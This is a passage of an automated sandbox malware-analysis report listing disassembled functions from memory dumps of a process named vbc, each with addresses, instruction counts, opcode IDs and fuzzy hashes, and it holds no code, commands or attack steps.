                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4363b74e2bae66347222bf8d7edc7690e0d18826cfb8033dc23f5af51ffd8f8b
                                                                                                    • Instruction ID: 15e1018e5ccbef52f4dafa53bd08780039bda2827c6ccb94c3f89ac3591144a4
                                                                                                    • Opcode Fuzzy Hash: 4363b74e2bae66347222bf8d7edc7690e0d18826cfb8033dc23f5af51ffd8f8b
                                                                                                    • Instruction Fuzzy Hash: EE213D34A10619DFDB00EF90E495B9EBBB6BF49304F608029E801AB388DB715D51CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484AEB0 Relevance: .1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fed1bd91a79db37351acf14863692e393eb55510b5d13de69971d8c8af2dd2fc
                                                                                                    • Instruction ID: 9a8078c52efc1d18c59393bfde820d6671e9aef9ae162278c59a3614fe51893e
                                                                                                    • Opcode Fuzzy Hash: fed1bd91a79db37351acf14863692e393eb55510b5d13de69971d8c8af2dd2fc
                                                                                                    • Instruction Fuzzy Hash: CD1182B8E5020F9FDF54DFA5D8804BEB7F1EB84310F509D25E412EB240EB35AA418BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FD7E2 Relevance: .1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d26e4ac52598ecce62c13b2e4bc6f7f71d2c46e416e9d976176eff9fe4e1af3c
                                                                                                    • Instruction ID: 0441b476ef8acebf65c163b5b2f2d0713bc3bed4fb253af9fb5eb74b0e148db1
                                                                                                    • Opcode Fuzzy Hash: d26e4ac52598ecce62c13b2e4bc6f7f71d2c46e416e9d976176eff9fe4e1af3c
                                                                                                    • Instruction Fuzzy Hash: F711D330E08248DFC301EB69D8518BABBBAEF49350710856FE256C7351C739D902CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00545890 Relevance: .1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 678754039edf19c347bb8090850ddb20a009a9ae3f88805a6d0997d491b25618
                                                                                                    • Instruction ID: 690cef5b62806b935dc57051f6e6fffc200dd95dca0ec7d36c5513296cff9ad9
                                                                                                    • Opcode Fuzzy Hash: 678754039edf19c347bb8090850ddb20a009a9ae3f88805a6d0997d491b25618
                                                                                                    • Instruction Fuzzy Hash: 0E116A34704605DFCB14DF68D890AAEBBB1AF89314F12816AE9459B761DB70EC01CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F2380 Relevance: .1, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 66f99b82bc5f779aabe94296ab70af068e1a51d76c360cdc64c9570922ee1fd7
                                                                                                    • Instruction ID: 51addb81ab092f05a16e2d876e9609cb4ce937b071e0379ce4fc24c35cc44b57
                                                                                                    • Opcode Fuzzy Hash: 66f99b82bc5f779aabe94296ab70af068e1a51d76c360cdc64c9570922ee1fd7
                                                                                                    • Instruction Fuzzy Hash: 7F11E05010D2D44FC3169A7898286767FA99F43214F0901EBD642CB2A3C6989D0AC3B7
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00260438 Relevance: .1, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 120014b12cc51efe3d9f6afa57cdc9e75cfef77e55a6fcbbd3d077125a2fa27c
                                                                                                    • Instruction ID: 825ad0dddfff31c4fa860c6d620194ad3e773365141517db064a71bfa9ccef35
                                                                                                    • Opcode Fuzzy Hash: 120014b12cc51efe3d9f6afa57cdc9e75cfef77e55a6fcbbd3d077125a2fa27c
                                                                                                    • Instruction Fuzzy Hash: 89116030C052498FCB44EFB9D8555EEBBB1EF8A301F10546AD109B72A1DB341A55CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052C3E1 Relevance: .1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0ab8fd1d08d91c4ca435ddc9f8b5636bf13009e97a914eb65b3261886ca6ab19
                                                                                                    • Instruction ID: 7c7ecc8548487edc7453f9bc5c57e3599488e8f1d18fb364a776ce2136aee25e
                                                                                                    • Opcode Fuzzy Hash: 0ab8fd1d08d91c4ca435ddc9f8b5636bf13009e97a914eb65b3261886ca6ab19
                                                                                                    • Instruction Fuzzy Hash: E4012B31608222DFDB196655F82177F3F66BF93362F3484ABA402C71D3D6344901A7E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F1B48 Relevance: .1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d23c9d5a6956e03f1b1fbb599f8a0f99ad45fce2a5df360268ffa20f8d5d9fa1
                                                                                                    • Instruction ID: 85626c9af6c91ca4fd20283ca267bc20056fb0ea8fb39fdfadfd884d968d0832
                                                                                                    • Opcode Fuzzy Hash: d23c9d5a6956e03f1b1fbb599f8a0f99ad45fce2a5df360268ffa20f8d5d9fa1
                                                                                                    • Instruction Fuzzy Hash: CC11C13120814CDFCB029F94D800CBE3F76EF95350B14806AFA02CB266D7369923DB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00544A00 Relevance: .1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f5f8d0ddc3ccb87b4c8b1de2369863b3c975ce63e8466c0edff4cf2eaf581b36
                                                                                                    • Instruction ID: bfb135c133948ac6ffbeb36ae46a5554e80eec994acfef4189c9f90884515b9b
                                                                                                    • Opcode Fuzzy Hash: f5f8d0ddc3ccb87b4c8b1de2369863b3c975ce63e8466c0edff4cf2eaf581b36
                                                                                                    • Instruction Fuzzy Hash: 8411A071B402059FCF209B6988157AE7BF6FB88310F148029E515D7380EB70C901DFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00520578 Relevance: .1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d3365fd62be70a67054ccfca69bd21a25b056fcf74448d6137b869f7055a9b78
                                                                                                    • Instruction ID: 671fab574722eb741c7b6e0d51a85166d7a7c93c2813efa5086697d21201607c
                                                                                                    • Opcode Fuzzy Hash: d3365fd62be70a67054ccfca69bd21a25b056fcf74448d6137b869f7055a9b78
                                                                                                    • Instruction Fuzzy Hash: 30118E71B001289FDB00EBA8D801BDEBBF9EB88750F104066EA05EB394D730AE118BD4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FFAD8 Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b160f56bf2037a411148f4d88bbd304f00c711e63e36a488bf2c355e066b8bd5
                                                                                                    • Instruction ID: 2322f702bbc2b4d8c84e14f89790ec1568f4ee71b08290d6a4a721e2cc7d35f2
                                                                                                    • Opcode Fuzzy Hash: b160f56bf2037a411148f4d88bbd304f00c711e63e36a488bf2c355e066b8bd5
                                                                                                    • Instruction Fuzzy Hash: B5018431B001089F9B40FBA9DC566BF77F9EB89354F004136E609E7385DA305D118BA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9640 Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b9ae8c6ee7e33be384ec15dbdbf3c26faaecf81b98898057f9f272df405cde3a
                                                                                                    • Instruction ID: 345e0bece89fa045f0d9c38a1fdbc042bd33e4380265eb497696d66c9a154d38
                                                                                                    • Opcode Fuzzy Hash: b9ae8c6ee7e33be384ec15dbdbf3c26faaecf81b98898057f9f272df405cde3a
                                                                                                    • Instruction Fuzzy Hash: 8601C02020E2C86FD302163558207A63F658F87350F1942E7DA49CF5D3C6694D09936A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00265090 Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 23efd67c75396cbda3d10d212f0e384cd36915dc8947b4b949a560867fb23afe
                                                                                                    • Instruction ID: 8687fc812b8ba202d521b783801e6396291f77f61053b6e8c43fc8e0b4d9649d
                                                                                                    • Opcode Fuzzy Hash: 23efd67c75396cbda3d10d212f0e384cd36915dc8947b4b949a560867fb23afe
                                                                                                    • Instruction Fuzzy Hash: 6D01287021D5C44FC3016B69ACB47BA3F659F86355F2800BAE18BC73A7CA100C63DB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00545810 Relevance: .1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a35ea4633c3ec3fbca1237de4dd1d9ad757f5503628e94b35da20a570ab63de1
                                                                                                    • Instruction ID: ec54846f8cb10af98acd280f186b16673ae3a0965ac83e481d179f52e1ffac85
                                                                                                    • Opcode Fuzzy Hash: a35ea4633c3ec3fbca1237de4dd1d9ad757f5503628e94b35da20a570ab63de1
                                                                                                    • Instruction Fuzzy Hash: E801D8336042585FD714DAEDD440BDAFFE4EB55324F2580ABE584CB261EA31DD80CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00541978 Relevance: .1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f2b5200f2c9c5e5038d96006e8549d56b116da297a1bbb375ac3eb18b92d143a
                                                                                                    • Instruction ID: 542b7d237c07a0bdea982d89d95c36b9abe4fdfb8c7a43a74f1e0bb2c663e921
                                                                                                    • Opcode Fuzzy Hash: f2b5200f2c9c5e5038d96006e8549d56b116da297a1bbb375ac3eb18b92d143a
                                                                                                    • Instruction Fuzzy Hash: 6611A031F056588BDB04CBAAE4586DEBBF2AF88210F14C16AD916AB340DB708C018B91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04849630 Relevance: .1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f9644857ffcb448ad79bbff39b669e94eae74e82d4bd07b32285c1197fa7a6a4
                                                                                                    • Instruction ID: 597a863510afa07d0c76badb04af407c46fb1e98da04e318c20a791c52d920c8
                                                                                                    • Opcode Fuzzy Hash: f9644857ffcb448ad79bbff39b669e94eae74e82d4bd07b32285c1197fa7a6a4
                                                                                                    • Instruction Fuzzy Hash: 3F01D2313147144BC328DF65989096BBBB6EFC522470A8A3DD686CBB00DF75E90987E5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FD7F0 Relevance: .1, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7b08b98d6fdb9846111906c5ab71b293a1ebebbc0d0c00482823e095209e501d
                                                                                                    • Instruction ID: 5f17a5c2f774c6b4c4ebc7011b9f6b97c0bba8da92604597ee5f8b60d8a42ea2
                                                                                                    • Opcode Fuzzy Hash: 7b08b98d6fdb9846111906c5ab71b293a1ebebbc0d0c00482823e095209e501d
                                                                                                    • Instruction Fuzzy Hash: 88117071E04218DFC340EBAAD84097ABBFAFB88354B10846AE657D7344C735E902CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F1CE8 Relevance: .1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a8b23e6f52b682c81c31f60fc9192face2fe7b9fbb21215fa0da11f3793e39bf
                                                                                                    • Instruction ID: 7bb3119bac3bd744f6756ef4f08108dc7319cb13519e0018c5a511a2d8ae8198
                                                                                                    • Opcode Fuzzy Hash: a8b23e6f52b682c81c31f60fc9192face2fe7b9fbb21215fa0da11f3793e39bf
                                                                                                    • Instruction Fuzzy Hash: F30171B750D2A89FD7034E254C114B53F74EAA331430985CBE551CB2B3D119A907AB37
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00544608 Relevance: .1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 697ebff07e6a242f7dc4e4372a123dbd635f6d0ec8b95e044e29f30aad4ea426
                                                                                                    • Instruction ID: b5c32241baefbdbeccc0e534bdb2d615407ab854acd340e8df14a35b93d503ea
                                                                                                    • Opcode Fuzzy Hash: 697ebff07e6a242f7dc4e4372a123dbd635f6d0ec8b95e044e29f30aad4ea426
                                                                                                    • Instruction Fuzzy Hash: 7501A736340215AFDB048F59DC84FDE7BA9FB99721F118066FA15CF390C6B1D8049B60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00260448 Relevance: .1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ec000b976b46ee1162c79bc04e156a4522f8968f2446aba5856cfa2e0b274d6f
                                                                                                    • Instruction ID: ad7541352e4255c5cba47797de266d6262c1faf6668ff159dbe0776d3a0d57ee
                                                                                                    • Opcode Fuzzy Hash: ec000b976b46ee1162c79bc04e156a4522f8968f2446aba5856cfa2e0b274d6f
                                                                                                    • Instruction Fuzzy Hash: 15113C30D0060A9FCB04EFE9D8555EEBBB5FF89305F108429D209B3250DB352A85CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00541988 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bf80547fe84c69e436da8d9b9eef91eadee7e3270bc601f28dfc650c29dbd291
                                                                                                    • Instruction ID: 282a929d7a1ab2a7be0c677a2b8594a09d3017d53024a43d8163c9ebb052341e
                                                                                                    • Opcode Fuzzy Hash: bf80547fe84c69e436da8d9b9eef91eadee7e3270bc601f28dfc650c29dbd291
                                                                                                    • Instruction Fuzzy Hash: E3016931F006588BDB08DBAAD8586DEBBF6ABC8210F14C12AD915BB340DA309D018BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054D760 Relevance: .0, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 47069676866d5acb39ae0d04cff0d9ee1c1461897ca4dabbe015fe25596244c2
                                                                                                    • Instruction ID: 371bdc1414471f919ca69bfa957f37a6b6c8b43efe7d1451abda0a985d09a525
                                                                                                    • Opcode Fuzzy Hash: 47069676866d5acb39ae0d04cff0d9ee1c1461897ca4dabbe015fe25596244c2
                                                                                                    • Instruction Fuzzy Hash: 5701D672B0E3D49FD72256696C243A8BFB0FF92658F4904FBDA88CB253D6644D098361
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00520569 Relevance: .0, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5f03349029c8bff2d9cfd352b19ef106061ff4fbfd853f55fea82d2daa97a4ef
                                                                                                    • Instruction ID: 82273158f78f22dd1394c5b857668ea9ef53790552909305cb01f87d0ef2df5a
                                                                                                    • Opcode Fuzzy Hash: 5f03349029c8bff2d9cfd352b19ef106061ff4fbfd853f55fea82d2daa97a4ef
                                                                                                    • Instruction Fuzzy Hash: D401F571A001289FDB00EB6898416EF7FF5EB88340F104169E905E7385D7345E118BE1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052DF60 Relevance: .0, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 95ebf9b49d7c97d321ebc39ecebfb4dc3315da92d718ab807a85dea99e58fa12
                                                                                                    • Instruction ID: 0c5affd087b663ff2b6fb17c6be292ddc87a4fd3c51d801b485b39d43ded52c1
                                                                                                    • Opcode Fuzzy Hash: 95ebf9b49d7c97d321ebc39ecebfb4dc3315da92d718ab807a85dea99e58fa12
                                                                                                    • Instruction Fuzzy Hash: A101623125E7805FC3079B6958258A97FB5AE8331430E85EFE089CF2A3CA194C1BD765
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484FB34 Relevance: .0, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 880ec018e1a505d95743ec092b74950688c358615c7eb16fb245cc9b0da83edf
                                                                                                    • Instruction ID: 1d08cedc609a286baaa12b09c09ad96a2a7786379e21ce9320fd366e20fe03a0
                                                                                                    • Opcode Fuzzy Hash: 880ec018e1a505d95743ec092b74950688c358615c7eb16fb245cc9b0da83edf
                                                                                                    • Instruction Fuzzy Hash: 2701F7313080488FDB06BB69A8A447EB797EBC4319F44867DE306C72C8CF646D4297DA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002604E0 Relevance: .0, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2831dae6e666d8319ae98e961b9763dbc88a43ee06f65f1c8da7d76a1b718f27
                                                                                                    • Instruction ID: 455577a0d96ada3d436666de4e6fe7fecfb7d27fa85cf669ea0021567961e4b9
                                                                                                    • Opcode Fuzzy Hash: 2831dae6e666d8319ae98e961b9763dbc88a43ee06f65f1c8da7d76a1b718f27
                                                                                                    • Instruction Fuzzy Hash: BB01D434909348DFCB16EBB4D49159E7B72AF46304F6088FDD405A73A5DB399E91CB01
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484A1B0 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bfc7eb7131df2f2d7d8a67e7ffe620d037a8c260f5c93fb0af2cd110063ca5a2
                                                                                                    • Instruction ID: 3182fe1d909a580921a0c7cf0659f9d8b239545a9f675686848f0f4d26b0a98b
                                                                                                    • Opcode Fuzzy Hash: bfc7eb7131df2f2d7d8a67e7ffe620d037a8c260f5c93fb0af2cd110063ca5a2
                                                                                                    • Instruction Fuzzy Hash: DB01A231300B244BC3289FA5985495AB7A6EFC06247068E3DD696DBB00DF76E90547D5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04849640 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9145aac20ba068425903bef837d0f2e105b20cff4205f85569bbddcb70989f43
                                                                                                    • Instruction ID: 2b0c567107becc210f868eecd272c3cbff3c7290ba04b7aa5534e3f48d82dcf7
                                                                                                    • Opcode Fuzzy Hash: 9145aac20ba068425903bef837d0f2e105b20cff4205f85569bbddcb70989f43
                                                                                                    • Instruction Fuzzy Hash: B201F271300B1447D324AF759450D5FB7A6EFC06243068E3CD6868BB00EF75E90547D5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

